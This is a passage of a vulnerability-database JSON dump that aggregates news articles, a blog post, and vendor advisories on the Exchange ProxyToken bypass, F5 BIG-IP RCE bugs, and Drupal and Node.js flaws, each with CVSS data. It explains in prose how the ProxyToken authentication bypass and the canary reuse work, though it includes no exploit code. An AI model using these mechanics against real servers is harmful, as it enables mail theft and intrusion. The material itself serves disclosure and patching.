sparked because in Apple\u2019s new ARM-based Macs, which contain its security-forward M1 chip, Boot Camp has been removed. Installing Windows 10 on M1 Macs requires an ARM copy of Microsoft\u2019s operating system.\n\nCraig Federighi, Apple\u2019s senior vice president of software engineering, said Apple is not planning to support Boot Camp on ARM-based Macs in the future, during a [Daring Fireball podcast](<https://youtu.be/Hg9F1Qjv3iU>).\n\nSeeing an opportunity, on April 14 [Parallels released an update](<https://www.parallels.com/blogs/parallels-desktop-apple-silicon-mac/>) for Parallels Desktop 16 for Mac that supports Mac computers with Apple M1 chip.\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-27T20:54:13", "type": "threatpost", "title": "Parallels Offers \u2018Inconvenient\u2019 Fix for High-Severity Bug", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766", "CVE-2021-34864"], "modified": "2021-08-27T20:54:13", "id": "THREATPOST:95C995B2005CA3F4467BC3C69862415E", "href": "https://threatpost.com/parallels-inconvenient-fix/168997/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-30T18:54:34", "description": "A serious security vulnerability in Microsoft Exchange Server that researchers have dubbed ProxyToken could allow an unauthenticated attacker to access and steal emails from a target\u2019s mailbox.\n\nMicrosoft Exchange uses two websites; one, the front end, is what users connect to in order to access email. The second is a back-end site that handles the authentication function.\n\n\u201cThe front-end website is mostly just a proxy to the back end. To allow access that requires forms authentication, the front end serves pages such as /owa/auth/logon.aspx,\u201d according to a [Monday posting](<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>) on the bug from Trend Micro\u2019s Zero Day Initiative. \u201cFor all post-authentication requests, the front end\u2019s main role is to repackage the requests and proxy them to corresponding endpoints on the Exchange Back End site. It then collects the responses from the back end and forwards them to the client.\u201d\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe issue arises specifically in a feature called \u201cDelegated Authentication,\u201d where the front end passes authentication requests directly to the back end. These requests contain a SecurityToken cookie that identify them; i.e., if the front end finds a non-empty cookie named SecurityToken, it delegates authentication to the back end. However, Exchange has to be specifically configured to have the back end perform the authentication checks; in a default configuration, the module responsible for that (the \u201cDelegatedAuthModule\u201d) isn\u2019t loaded.\n\n\u201cWhen the front end sees the SecurityToken cookie, it knows that the back end alone is responsible for authenticating this request,\u201d according to ZDI. \u201cMeanwhile, the back end is completely unaware that it needs to authenticate some incoming requests based upon the SecurityToken cookie, since the DelegatedAuthModule is not loaded in installations that have not been configured to use the special delegated authentication feature. The net result is that requests can sail through, without being subjected to authentication on either the front or back end.\u201d\n\nFrom there, attacker could install a forwarding rule allowing them to read the victim\u2019s incoming mail.\n\n\u201cWith this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users,\u201d according to the post. \u201cAs an illustration of the impact, this can be used to copy all emails addressed to a target and account and forward them to an account controlled by the attacker.\u201d\n\nZDI outlined an exploitation scenario wherein an attacker has an account on the same Exchange server as the victim. However, if an administrator permits forwarding rules having arbitrary internet destinations, no Exchange credentials are needed at all, researchers noted.\n\nThe bug ([CVE-2021-33766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33766>)) was reported to the Zero Day Initiative by researcher Le Xuan Tuyen of VNPT ISC, and it was patched by Microsoft in the July Exchange cumulative updates. Organizations should update their products to avoid compromise.\n\nThe ProxyToken revelation comes after [the disclosure of](<https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>) ProxyLogon in early March; that\u2019s an exploit chain comprised of four Exchange flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065), which together create a pre-authentication remote code execution (RCE) exploit. Attackers can take over unpatched servers without knowing any valid account credentials, giving them access to email communications and the opportunity to install a web shell for further exploitation within the environment. ProxyLogon was weaponized in [wide-scale attacks](<https://threatpost.com/fbi-proxylogon-web-shells/165400/>) throughout the spring.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-30T17:31:06", "type": "threatpost", "title": "Microsoft Exchange 'ProxyToken' Bug Allows Email Snooping", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-33766"], "modified": "2021-08-30T17:31:06", "id": "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "href": "https://threatpost.com/microsoft-exchange-proxytoken-email/169030/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-11T14:39:21", "description": "F5 Networks is warning users to patch four critical remote command execution (RCE) flaws in its BIG-IP and BIG-IQ enterprise networking infrastructure. If exploited, the flaws could allow attackers to take full control over a vulnerable system.\n\nThe company released an advisory, Wednesday, on seven bugs in total, with two others rated as high risk and one rated as medium risk, respectively. \u201cWe strongly encourage all customers to update their BIG-IP and BIG-IQ systems to a fixed version as soon as possible,\u201d the company [advised](<https://www.f5.com/services/support/March2021_Vulnerabilities>) on its website.\n\nThe scenario is particularly urgent as F5 provides enterprise networking to some of the largest tech companies in the world, including Facebook, Microsoft and Oracle, as well as to a trove of Fortune 500 companies, including some of the world\u2019s biggest financial institutions and ISPs.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe U.S. Cybersecurity and Infrastructure Agency (CISA) also [urged](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/10/f5-security-advisory-rce-vulnerabilities-big-ip-big-iq>) companies using BIG-IP and BIG-IQ to fix two of the critical vulnerabilities, which are being tracked as [CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>) and [CVE-2021-22987](<https://support.f5.com/csp/article/K18132488>).\n\nThe former, with a CVSS rating of 9.8, is an unauthenticated remote command execution vulnerability in the iControl REST interface, according to a [detailed breakdown](<https://support.f5.com/csp/article/K02566623>) of the bugs in F5\u2019s Knowledge Center. The latter, with a CVSS rating of 9.9, affects the infrastructure\u2019s Traffic Management User Interface (TMUI), also referred to as the Configuration utility. When running in Appliance mode, the TMUI has an authenticated RCE vulnerability in undisclosed pages, according to F5.\n\nThe two other critically rated vulnerabilities are being tracked as [CVE-2021-22991](<https://support.f5.com/csp/article/K56715231>) and [CVE-2021-22992](<https://support.f5.com/csp/article/K52510511>). The first, with a CVSS score of 9.0, is a buffer overflow vulnerability that can be triggered when \u201cundisclosed requests to a virtual server may be incorrectly handled by the Traffic Management Microkernel (TMM) URI normalization,\u201d according to F5. This can result in a denial-of-service (DoS) attack, that, in some situations, \u201cmay theoretically allow bypass of URL based access control or remote code execution (RCE),\u201d the company warned.\n\nCVE-2021-22992 is also a buffer overflow bug with a CVSS rating of 9. This flaw can be triggered by \u201ca malicious HTTP response to an Advanced WAF/BIG-IP ASM virtual server with Login Page configured in its policy,\u201d according to F5. It also may allow for RCE and \u201ccomplete system compromise\u201d in some situations, the company warned.\n\nThe other three non-critical bugs being patched in F5\u2019s update this week are [CVE-2021-22988](<https://support.f5.com/csp/article/K70031188>), [CVE-2021-22989](<https://support.f5.com/csp/article/K56142644>) and [CVE-2021-22990](<https://support.f5.com/csp/article/K45056101>).\n\nCVE-2021-22988, with a CVSS score of 8.8, is an authenticated RCE that also affects TMUI. CVE-2021-22989, with a CVSS rating of 8.0, is another authenticated RCE that also affects TMUI in Appliance mode, this time when Advanced WAF or BIG-IP ASM are provisioned. And CVE-2021-2290, with a CVSS score of 6.6, is a similar but less dangerous vulnerability that exists in the same scenario, according to F5.\n\nF5 is no stranger to critical bugs in its enterprise networking products. In July, the vendor and other security experts\u2014including U.S. Cyber Command\u2014urged companies to deploy an urgent patch for a critical RCE vulnerability in BIG-IP\u2019s app delivery controllers that was being actively exploited by attackers to scrape credentials, launch malware and more. That bug, ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), had a CVSS rating of 10 out of 10. Moreover, a delay in patching at the time left systems [exposed to the flaw](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>) for weeks after F5 released the fix.\n\n_**Check out our free **_[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:**_\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-11T14:21:50", "type": "threatpost", "title": "F5, CISA Warn of Critical BIG-IP and BIG-IQ RCE Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5902", "CVE-2021-2290", "CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-22991", "CVE-2021-22992"], "modified": "2021-03-11T14:21:50", "id": "THREATPOST:1D03F5885684829E899CEE4F63F5AC27", "href": "https://threatpost.com/f5-cisa-critical-rce-bugs/164679/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-05-23T16:36:04", "description": "Microsoft Exchange Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Information Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-33766", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33766", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "malwarebytes": [{"lastseen": "2021-09-02T12:34:56", "description": "Had I known this season of Microsoft Exchange was going to be so long I'd have binge watched. Does anyone know how many episodes there are?\n\nSarcasm aside, while ProxyToken may seem like yet another episode of 2021's longest running show, that doesn\u2019t make it any less serious, or any less eye-catching. The plot is a real nail-biter (and there's a shocking twist at the end).\n\nThis week's instalment is called ProxyToken. It's a vulnerability that allows an unauthenticated attacker to perform configuration actions on mailboxes belonging to arbitrary users. For example, an attacker could use the vulnerability to forward your mail to their account, and read all of your email. And not just your account. The mail for all your co-workers too. So there are multiple possible themes for this episode, including plain old data theft, industrial espionage, or just espionage.\n\n### Background and character development\n\nBefore we can explain this week's plot, it's important to catch up on some background information, and meet some of the principal players.\n\nExchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during installation. The installation also creates two sites in IIS. One is the default website, listening on ports 80 for HTTP and 443 for HTTPS. This is the site that all clients connect to for web access.\n\nThis front end website for Microsoft Exchange in IIS is mostly just a proxy to the back end. The Exchange back end listens on ports 81 for HTTP and 444 for HTTPS. For all post-authentication requests, the front end\u2019s job is to repackage the requests and proxy them to corresponding endpoints on the Exchange Back End site. It then collects the responses from the back end and forwards them to the client.\n\nWhich is all good, if it weren\u2019t for a feature called \u201cDelegated Authentication\u201d that Exchange supports for cross-forest topologies. An Active Directory forest (AD forest) is the top most logical container in an Active Directory configuration that contains domains, users, computers, and group policies. A single Active Directory configuration can contain more than one domain, and we call the tier above domain the AD forest. Under each domain, you can have several trees, and it can be tough to see the forest for the trees.\n\nForest trusts reduce the number of external trusts that need to be created. Forest trusts are created between the root domains of two forests. In such deployments, the Exchange Server front end is not able to perform authentication decisions on its own. Instead, the front end passes requests directly to the back end, relying on the back end to determine whether the request is properly authenticated. These requests that are to be authenticated using back-end logic are identified by the presence of a SecurityToken cookie.\n\n### The plot\n\nFor requests where the front end finds a non-empty cookie named SecurityToken, it delegates authentication to the back end. But, the back end is sometimes completely unaware that it needs to authenticate these incoming requests based upon the SecurityToken cookie, since the DelegatedAuthModule that checks for this cookie is not loaded in installations that have not been configured to use the special delegated authentication feature. With the astonishing end result that specially crafted requests can go through, without being subjected to authentication. Not on the front end nor on the back end.\n\n### The twist\n\nThere is one additional hurdle an attacker needs to clear before they can successfully issue an unauthenticated request, but it turns out to be a minor nuisance. Each request to an Exchange Control Pane (ECP) page is required to have a ticket known as the \u201cECP canary\u201d. Without a canary, the request will result in an HTTP 500 response.\n\nHowever, imagine the attacker\u2019s luck, the 500 error response is accompanied by a valid canary! Which the attacker can use in his next, specially crafted, request.\n\n### The cliffhanger\n\nThis particular exploit assumes that the attacker has an account on the same Exchange server as the victim. It installs a forwarding rule that allows the attacker to read all the victim\u2019s incoming mail. On some Exchange installations, an administrator may have set a global configuration value that permits forwarding rules having arbitrary Internet destinations, and in that case, the attacker does not need any Exchange credentials at all. Furthermore, since the entire ECP site is potentially affected, various other means of exploitation may be available as well.\n\n### Credits\n\nThe ProxyToken vulnerability was reported to the [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>) in March 2021 by researcher Le Xuan Tuyen of VNPT ISC. The vulnerability is listed under [CVE-2021-33766](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33766>) as a Microsoft Exchange Information Disclosure Vulnerability and it was published by Microsoft in the July 2021 Exchange cumulative updates. This CVE was addressed by updates that were released in April 2021, but the CVE was inadvertently omitted from the April 2021 Security Updates.\n\n### Other "must watch" episodes\n\nMicrosoft Exchange has been riveting viewing this year, and with four months of the year to go it seems unlikely that ProxyToken is going to be the season finale. So here's a list of this season's "must watch" episodes (so far). If you've missed any, we suggest you catch up as soon as possible.\n\n * ProxyToken\n * [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>)\n * [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\n * [ProxyOracle](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-2-ProxyOracle/>)\n\nAnd remember, Exchange is attracting a lot of interest this year. Everyone's a fan. All of these vulnerabilities are being actively scanned for and exploited by malware peddlers, including ransomware gangs.\n\nThe post [ProxyToken: Another nail-biter from Microsoft Exchange](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/proxytoken-another-nailbiter-from-microsoft-exchange/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-31T13:29:05", "type": "malwarebytes", "title": "ProxyToken: Another nail-biter from Microsoft Exchange", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-31T13:29:05", "id": "MALWAREBYTES:BDB324B2E5CD88570A6B585DB46F717D", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/proxytoken-another-nailbiter-from-microsoft-exchange/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdi": [{"lastseen": "2023-05-23T15:50:04", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the authentication of requests to web services within the ecp web application. By issuing a crafted request, an attacker can bypass authentication. An attacker can leverage this vulnerability to disclose information from the server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-15T00:00:00", "type": "zdi", "title": "Microsoft Exchange Server ECP Authentication Bypass Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-07-15T00:00:00", "id": "ZDI-21-798", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-798/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ibm": [{"lastseen": "2023-02-27T21:47:09", "description": "## Summary\n\nIBM API Connect has addressed the following vulnerability.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-13671](<https://vulners.com/cve/CVE-2020-13671>) \n** DESCRIPTION: **Drupal Core could allow a remote attacker to execute arbitrary code on the system, caused by the failure to properly sanitize certain filenames on uploaded files. By interpreting files as the incorrect extension and served as the wrong MIME type, an attacker could exploit this vulnerability to execute arbitrary PHP code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/191949](<https://exchange.xforce.ibmcloud.com/vulnerabilities/191949>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM API Connect| IBM API Connect V5.0.0.0-5.0.8.10 \nIBM API Connect| V10.0.1.0 \nIBM API Connect| V2018.4.1.0-2018.4.1.13 \n \n\n\n## Remediation/Fixes\n\n## \n\n\nAffected Product| Addressed in VRMF| APAR| Remediation/First Fix \n---|---|---|--- \n \nIBM API Connect \n\nV5.0.0.0-5.0.8.10\n\n| 5.0.8.10 iFix | LI81861 | \n\nAddressed in IBM API Connect 5.0.8.10 iFix published on or after Nov 23, 2020.\n\nDeveloper Portal is impacted.\n\nFollow this link and find the \"Portal\" package.\n\n[http://www.ibm.com/support/fixcentral/swg/quickorder](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.8.10&platform=All&function=all&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder\" ) \n \nIBM API Connect \n\nV2018.4.1.0-2018.4.1.13\n\n| 2018.4.1.15| \n\nLI81861\n\n| \n\nAddressed in IBM API Connect V2018.4.1.15.\n\nDeveloper Portal is impacted.\n\nFollow this link and find the \"Portal\" package.\n\n \n\n\n[http://www.ibm.com/support/fixcentral/swg/quickorder](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=2018.4.1.13&platform=All&function=all&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder\" ) \n \nIBM API Connect \n\nV10.0.0.0-V10.0.1.0\n\n| 10.0.1.1| \n\nLI81861\n\n| \n\nAddressed in IBM API Connect V10.0.1.1\n\nDeveloper Portal is impacted.\n\nFollow this link and find the \"Portal\" package.\n\n[http://www.ibm.com/support/fixcentral/swg/quickorder](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.1.0&platform=All&function=all&source=fc> \"http://www.ibm.com/support/fixcentral/swg/quickorder\" ) \n \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-02T14:58:19", "type": "ibm", "title": "Security Bulletin: IBM API Connect's Developer Portal is vulnerable to arbitrary code excution in Drupal Core (CVE-2020-13671)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2021-02-02T14:58:19", "id": "CDAD34A91006F074A8F35D92B48F8CC9A791B0245670197CE6014F52DEE81660", "href": "https://www.ibm.com/support/pages/node/6410870", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-02T20:04:54", "description": "## Summary\n\nVulnerabilities in Apache and Node.js such as execution of arbitrary code on the system, cross -site scripting, and bypassing security restrictions, may affect IBM Spectrum Protect Plus.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2020-28458](<https://vulners.com/cve/CVE-2020-28458>) \n**DESCRIPTION: **Node.js datatables.net module could allow a remote attacker to execute arbitrary code on the system, caused by a prototype pollution flaw. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/193390](<https://exchange.xforce.ibmcloud.com/vulnerabilities/193390>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID: **[CVE-2021-21315](<https://vulners.com/cve/CVE-2021-21315>) \n**DESCRIPTION: **System Information Library for Node.JS could allow a remote attacker to execute arbitrary commands on the system, caused by command injection flaw when parsing service parameters. By sending a specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196894](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196894>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2020-13959](<https://vulners.com/cve/CVE-2020-13959>) \n**DESCRIPTION: **Apache Velocity Tools is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the default error page for VelocityView. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197994](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197994>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID: **[CVE-2020-13936](<https://vulners.com/cve/CVE-2020-13936>) \n**DESCRIPTION: **Apache Velocity could allow a remote attacker to execute arbitrary code on the system, caused by a sandbox bypass flaw. By modifying the Velocity templates, an attacker could exploit this vulnerability to execute arbitrary code with the same privileges as the account running the Servlet container. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/197993](<https://exchange.xforce.ibmcloud.com/vulnerabilities/197993>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2020-13956](<https://vulners.com/cve/CVE-2020-13956>) \n**DESCRIPTION: **Apache HttpClient could allow a remote attacker to bypass security restrictions, caused by the improper handling of malformed authority component in request URIs. By passing request URIs to the library as java.net.URI object, an attacker could exploit this vulnerability to pick the wrong target host for request execution. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/189572](<https://exchange.xforce.ibmcloud.com/vulnerabilities/189572>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n## Affected Products and Versions\n\n**Affected Product(s)** | **Version(s)** \n---|--- \nIBM Spectrum Protect Plus | 10.1.0-10.1.7 \n \n## Remediation/Fixes\n\n**BM Spectrum Protect** \n**Plus Release** | **First Fixing** \n**VRM Level** | **Platform** | **Link to Fix** \n---|---|---|--- \n10.1 | 10.1.8 | Linux | <https://www.ibm.com/support/pages/node/6415111> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-24T06:55:55", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache and Node.js affect IBM Spectrum Protect Plus", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 